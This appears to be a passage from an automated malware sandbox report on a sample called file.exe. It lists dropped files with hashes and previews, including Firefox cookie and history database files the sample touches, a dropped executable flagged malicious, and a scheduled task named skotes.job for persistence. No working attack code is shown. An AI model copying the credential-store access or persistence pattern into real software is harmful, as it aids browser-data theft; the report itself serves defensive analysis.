Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IjY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VjY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VjY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VjY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............>.q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Nov 10 02:55:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9908857463189205
Encrypted:	false
SSDEEP:	48:8FdITsYAHdidAKZdA1vehDiZUkwqehey+R:8AfDky
MD5:	EA8D4A325A9EF9612828BF29135DA11D
SHA1:	6A0B15469964D89061E268A9A22DD8CA65146097
SHA-256:	E77BFD0408A7A54D25BD648DC4E950B128B8030858BCA9588633D732528BE96D
SHA-512:	980E95408377D0AB1CD557DCCE1F7F22CB8CD6D2263585460C96DE808E9EA16DDB66D82D0C9DCF29BC301F422516737ECB9B24B5E55685F90F8ED1FF181A4AEE
Malicious:	false
Preview:	L..................F.@.. ...$+.,......4T$3..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IjY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VjY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VjY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VjY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VjY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............>.q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Nov 10 02:55:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9820379500183285
Encrypted:	false
SSDEEP:	48:8ZdITsYAHdidAKZdA1hehBiZUk1W1qehoy+C:8MfT9Iy
MD5:	A7E8E42ECC6A50F72C7E008DA5F039FF
SHA1:	E6A7833AE6F8015A6CE5531C2BC195838F158E90
SHA-256:	C5CAC231237C9DE4D6C3EDDB4158B2B60258C2051C46934CE58CC41BEE3B130D
SHA-512:	8A3DA6594A3B04DECE45CC30E945378699F7BD1F3EBC03D0CF5F7CE6B4780B20809AF3E3B2467C237BD9A65E8E2A32C5D11142676323E93DBA0F91C3177C46B2
Malicious:	false
Preview:	L..................F.@.. ...$+.,......>T$3..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IjY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VjY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VjY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VjY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VjY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............>.q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Nov 10 02:55:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9882632322940825
Encrypted:	false
SSDEEP:	48:8DdITsYAHdidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbmy+yT+:8ifDT/TbxWOvTbmy7T
MD5:	58E58BFE141A9A393A7FFE7F916072FA
SHA1:	88C596120367F7EB03023F170B1DEA33E8FC2728
SHA-256:	16E2368E072C1A36C64C4103372B8305C38C8035660DBEF98F18C76A86C80A70
SHA-512:	5A2935B152AB325459BCDF85917F6642CB23D0890C87E48A2BF5B530F18D851B833D321D0EC7A89416F879BCB77C4B809341671DF9ED5D4402236454E4D22691
Malicious:	false
Preview:	L..................F.@.. ...$+.,.... --T$3..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IjY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VjY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VjY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VjY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VjY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............>.q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\DocumentsDHCAECGIEB.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3258368
Entropy (8bit):	6.666524898382995
Encrypted:	false
SSDEEP:	98304:FfTOPH8V6aHt8aRSceVZdqjolGQst+BjaPFLsy:MbatIjaPFLs
MD5:	571952385750F4874BB235D9E5E61120
SHA1:	EE1F74C0E61BABC831F50FA78C1F9554BC89F145
SHA-256:	614B9728AACD01AC0921F1FF51151D0F64426239B0F1C956FC18E05F0917F33C
SHA-512:	4F584B0376978DDEE7DCF7547B21B5645A6D785CCC92FF7E0FD1DF9DE17880AD0C7C824A32317FD38109824E436B7A7A555EC5676D5D49156DAB1B36CEDAC065
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.......2...@.................................W...k.............................1.............................l.1..................................................... . ............................@....rsrc...............................@....idata ............................@...brbzgqah..+.......*.................@...rlxxbpej......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsDHCAECGIEB.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.41794725465253
Encrypted:	false
SSDEEP:	6:Svy8jdbX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lBMZt0:F2ruQ1CGAFifXVBMZt0
MD5:	D5FFE368293E9329C0CB9B0CAC25E82A
SHA1:	095C2BF50C2B191386F2AC6D8FC4292BB6D08D72
SHA-256:	8E7C725F290FB6694F264BEC16285FE1D1650C7C85D9D99D8AFAAE17F79CD1B3
SHA-512:	488C0DFC518B6A353CFC91F5017611C5EB5F13E6ECBE1568B0605675BB00CEBC34BCEC7A6D8B215511755C24429CC37C07B891976F7D295666C8DD6A6D49BC6F
Malicious:	false
Preview:	......l.0N.,Hwg1..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................8.@3P.........................

Chrome Cache Entry: 562

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 563

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 564

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 565

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 566

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 567

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 568

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:HMB:k
MD5:	0B04EA412F8FC88B51398B1CBF38110E
SHA1:	E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
SHA-256:	7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
SHA-512:	6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
Preview:	CgkKBw2/5iXyGgA=

Chrome Cache Entry: 569

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	dropped
Size (bytes):	146588
Entropy (8bit):	5.435201149208042
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/Y:Wof3G0NSkNzMeO7z/Y
MD5:	CDDD08F555372F639CFAEAAC14F77689
SHA1:	966DAD6F16CCD9BCE2E92D92D14A420240A99570
SHA-256:	5A8EB6674746D52E9D687A1EAADE1CEF8FDE68F333F2EF5CA6A549ABCC80CC09
SHA-512:	25A3FBB2F0356419D9FE466C77394CA0268B1380FDD06E53888F2D700163385B189D32DF99F0CC0BB020323A3537DCEDF60C4787A9260C875C71ED8B8BB7231E
Malicious:	false
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 570

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2122)
Category:	downloaded
Size (bytes):	2127
Entropy (8bit):	5.8239789501942605
Encrypted:	false
SSDEEP:	48:YQoTL7aR8BTbKlgZ01OttcH6666M9XOoryF+xv2FWTOoQquSEqmffffQo:9oTnRBTmlirqH66664XpyFA2ATOoiffb
MD5:	40D2C67618A1F2D8E3CDEE8E4593A832
SHA1:	16C108A7779DF61914A40B73EE311A66D0C33804
SHA-256:	46C39C59E1A3723496198E023035D2E2DC0C022A43827771C92A41162CAB99BD
SHA-512:	74D98D882D34BE22984DB0C5702B1A62B8F098D12FEB8CDF654E97137147B83FF35B65D5A0CC37AF270D60EB405142F9CAF88E03DFB5D0B52B9639B3E312436C
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["ambassador bridge canada","target holiday bears giveaway","denver broncos vs kansas city chiefs","denver airport flights delayed","northern lights aurora forecast","dragon age veilguard","aldi cheese recalled","carolina hurricanes prediction"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXFxamI2aHNmEgpWaWRlbyBnYW1lMsMGZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFCRUFRQU1CSWdBQ0VRRURFUUgveEFBYUFBRUFBZ01CQUFBQUFBQUFBQUFBQUFBQUFnTUVCUWNCLzhRQUxSQUFBZ0VEQXdNQ0F3a0FBQUFBQUFBQUFRSURBQVFSRWhNaElqRkJCZkFVVW

Chrome Cache Entry: 571

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	18477
Entropy (8bit):	5.147347768532056
Encrypted:	false
SSDEEP:	384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
MD5:	9A6B01877BAAC986FE1FBF4CAA95E7C7
SHA1:	A3227894EACEB2177EEE7CF66A693A9B4C0971FE
SHA-256:	12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
SHA-512:	5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
Malicious:	false
